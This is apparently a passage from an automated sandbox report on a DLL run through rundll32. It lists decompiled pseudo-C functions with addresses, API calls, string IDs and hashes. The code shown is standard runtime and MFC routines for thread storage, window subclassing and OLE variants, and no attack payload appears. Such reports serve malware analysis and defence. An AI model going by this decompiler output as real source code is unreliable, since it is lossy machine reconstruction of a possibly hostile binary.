							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100547c8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10057938);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100310CD();
							 *0x10057934 = E10035042( *0x10057934);
							 *0x10057938 = E10035042( *0x10057938);
							 *0x1005793c = E10035042( *0x1005793c);
							 *0x10057940 = E10035042( *0x10057940);
							_t18 = E10035923();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10035178(_t37);
								goto L15;
							} else {
								_push(E10035304);
								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100547c4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10035840(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x100547c4);
										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100351B5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10035178(_t37);
					return 0;
				}
			}

















                                                                                                                    0x1003548e
                                                                                                                    0x1003548e
                                                                                                                    0x1003549a
                                                                                                                    0x1003549e
                                                                                                                    0x100354be
                                                                                                                    0x100354cb
                                                                                                                    0x100354d8
                                                                                                                    0x100354dd
                                                                                                                    0x100354df
                                                                                                                    0x100354e6
                                                                                                                    0x100354ec
                                                                                                                    0x100354f1
                                                                                                                    0x10035509
                                                                                                                    0x1003550e
                                                                                                                    0x10035518
                                                                                                                    0x10035522
                                                                                                                    0x10035528
                                                                                                                    0x100354f3
                                                                                                                    0x100354f3
                                                                                                                    0x100354fa
                                                                                                                    0x00000000
                                                                                                                    0x100354fc
                                                                                                                    0x100354fc
                                                                                                                    0x10035503
                                                                                                                    0x00000000
                                                                                                                    0x10035505
                                                                                                                    0x10035505
                                                                                                                    0x10035507
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10035507
                                                                                                                    0x10035503
                                                                                                                    0x100354fa
                                                                                                                    0x1003552d
                                                                                                                    0x10035533
                                                                                                                    0x10035536
                                                                                                                    0x1003553b
                                                                                                                    0x1003560d
                                                                                                                    0x1003560d
                                                                                                                    0x1003560d
                                                                                                                    0x10035541
                                                                                                                    0x10035548
                                                                                                                    0x1003554a
                                                                                                                    0x1003554c
                                                                                                                    0x00000000
                                                                                                                    0x10035552
                                                                                                                    0x10035552
                                                                                                                    0x10035568
                                                                                                                    0x10035578
                                                                                                                    0x10035588
                                                                                                                    0x10035595
                                                                                                                    0x1003559a
                                                                                                                    0x1003559f
                                                                                                                    0x100355a1
                                                                                                                    0x10035608
                                                                                                                    0x10035608
                                                                                                                    0x00000000
                                                                                                                    0x100355a3
                                                                                                                    0x100355a3
                                                                                                                    0x100355b4
                                                                                                                    0x100355b6
                                                                                                                    0x100355b9
                                                                                                                    0x100355be
                                                                                                                    0x00000000
                                                                                                                    0x100355c0
                                                                                                                    0x100355cc
                                                                                                                    0x100355ce
                                                                                                                    0x100355d2
                                                                                                                    0x00000000
                                                                                                                    0x100355d4
                                                                                                                    0x100355d4
                                                                                                                    0x100355d5
                                                                                                                    0x100355e9
                                                                                                                    0x100355eb
                                                                                                                    0x00000000
                                                                                                                    0x100355ed
                                                                                                                    0x100355ed
                                                                                                                    0x100355ef
                                                                                                                    0x100355f0
                                                                                                                    0x100355f7
                                                                                                                    0x100355fd
                                                                                                                    0x10035601
                                                                                                                    0x10035605
                                                                                                                    0x10035605
                                                                                                                    0x100355eb
                                                                                                                    0x100355d2
                                                                                                                    0x100355be
                                                                                                                    0x100355a1
                                                                                                                    0x1003554c
                                                                                                                    0x10035611
                                                                                                                    0x100354a0
                                                                                                                    0x100354a0
                                                                                                                    0x100354a8
                                                                                                                    0x100354a8

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                    • __mtterm.LIBCMT ref: 100354A0
                                                                                                                      • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                      • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                    • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                    • __init_pointers.LIBCMT ref: 10035552
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                    • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                    • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                    • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                    • API String ID: 4287529916-3819984048
                                                                                                                    • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                    • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                    • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                    • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E10030D90(E1004429C, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E10015B30);
				 *(_t117 - 0x120) = _t111;
				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E100201F1(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x10057854;
						if( *0x10057854 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x10057454;
								if( *0x10057454 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E10030030(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x10057454 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E10032D2F(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E1001B083(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
							__eflags = _t83 - E1001B780;
							if(_t83 != E1001B780) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E1001F30C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E10014B55(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E10030E13(_t94, _t106, _t111);
				}
			}



























                                                                                                                    0x1001c915
                                                                                                                    0x1001c915
                                                                                                                    0x1001c915
                                                                                                                    0x1001c91f
                                                                                                                    0x1001c924
                                                                                                                    0x1001c927
                                                                                                                    0x1001c92a
                                                                                                                    0x1001c934
                                                                                                                    0x1001c93a
                                                                                                                    0x1001c941
                                                                                                                    0x1001c943
                                                                                                                    0x1001c946
                                                                                                                    0x1001c94e
                                                                                                                    0x1001c950
                                                                                                                    0x1001c950
                                                                                                                    0x1001c959
                                                                                                                    0x1001c96e
                                                                                                                    0x1001c970
                                                                                                                    0x1001c973
                                                                                                                    0x1001c978
                                                                                                                    0x1001c97a
                                                                                                                    0x1001c97e
                                                                                                                    0x1001c984
                                                                                                                    0x1001c99b
                                                                                                                    0x1001c99b
                                                                                                                    0x1001c9a2
                                                                                                                    0x1001c9ef
                                                                                                                    0x1001c9ef
                                                                                                                    0x1001c9f1
                                                                                                                    0x1001ca59
                                                                                                                    0x1001ca61
                                                                                                                    0x1001ca9d
                                                                                                                    0x1001caa9
                                                                                                                    0x1001cab0
                                                                                                                    0x1001cae2
                                                                                                                    0x1001cae5
                                                                                                                    0x1001caeb
                                                                                                                    0x1001caed
                                                                                                                    0x1001caf0
                                                                                                                    0x1001caf8
                                                                                                                    0x1001caff
                                                                                                                    0x1001cb01
                                                                                                                    0x1001cb03
                                                                                                                    0x1001cb0a
                                                                                                                    0x1001cb12
                                                                                                                    0x1001cb14
                                                                                                                    0x1001cb17
                                                                                                                    0x1001cb1a
                                                                                                                    0x1001cb28
                                                                                                                    0x1001cb28
                                                                                                                    0x1001cb17
                                                                                                                    0x1001cb03
                                                                                                                    0x1001cb2e
                                                                                                                    0x1001cb34
                                                                                                                    0x1001cb40
                                                                                                                    0x1001cb46
                                                                                                                    0x1001cb4d
                                                                                                                    0x1001cb4f
                                                                                                                    0x1001cb54
                                                                                                                    0x1001cb5a
                                                                                                                    0x1001cb5a
                                                                                                                    0x1001cb5a
                                                                                                                    0x1001cb5a
                                                                                                                    0x00000000
                                                                                                                    0x1001cb5e
                                                                                                                    0x00000000
                                                                                                                    0x1001cab2
                                                                                                                    0x1001ca65
                                                                                                                    0x1001ca70
                                                                                                                    0x1001ca7b
                                                                                                                    0x1001ca81
                                                                                                                    0x1001ca87
                                                                                                                    0x1001ca88
                                                                                                                    0x1001ca8a
                                                                                                                    0x1001ca92
                                                                                                                    0x1001ca95
                                                                                                                    0x1001ca9b
                                                                                                                    0x1001cac1
                                                                                                                    0x1001cac7
                                                                                                                    0x1001cac9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001cad3
                                                                                                                    0x1001cad7
                                                                                                                    0x1001cadc
                                                                                                                    0x1001cae0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001cae0
                                                                                                                    0x00000000
                                                                                                                    0x1001ca9b
                                                                                                                    0x1001c9f9
                                                                                                                    0x1001c9fe
                                                                                                                    0x1001ca05
                                                                                                                    0x1001ca0e
                                                                                                                    0x1001ca24
                                                                                                                    0x1001ca26
                                                                                                                    0x1001ca2c
                                                                                                                    0x1001ca2e
                                                                                                                    0x1001ca30
                                                                                                                    0x1001ca30
                                                                                                                    0x1001ca38
                                                                                                                    0x1001ca3c
                                                                                                                    0x1001ca40
                                                                                                                    0x1001ca44
                                                                                                                    0x1001ca4a
                                                                                                                    0x1001ca4d
                                                                                                                    0x1001ca4f
                                                                                                                    0x1001ca4f
                                                                                                                    0x00000000
                                                                                                                    0x1001ca44
                                                                                                                    0x1001c9a7
                                                                                                                    0x1001c9ad
                                                                                                                    0x1001c9b2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c9b8
                                                                                                                    0x1001c9bb
                                                                                                                    0x1001c9c0
                                                                                                                    0x1001c9cd
                                                                                                                    0x1001c9d1
                                                                                                                    0x1001c9d7
                                                                                                                    0x1001c9d7
                                                                                                                    0x1001c9e0
                                                                                                                    0x1001c9e5
                                                                                                                    0x1001c9e9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c9e9
                                                                                                                    0x1001c986
                                                                                                                    0x1001c98d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c993
                                                                                                                    0x1001c995
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c95b
                                                                                                                    0x1001c963
                                                                                                                    0x1001cb60
                                                                                                                    0x1001cb65
                                                                                                                    0x1001cb65

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                      • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                    • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                    • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                    • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                    • _memset.LIBCMT ref: 1001CA70
                                                                                                                    • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                    • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                    • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                    • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                    • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                    • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                    • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                    • API String ID: 867647115-4034971020
                                                                                                                    • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                    • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                    • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                    • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 46%
                                                                                                                    			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10030DFF(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10030030(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E1002BDD9(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1002DAF2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10014517(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1002CDE9(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1001FCED(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100144EC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E10033135(_t300 + 0x14, 0x100505f8);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
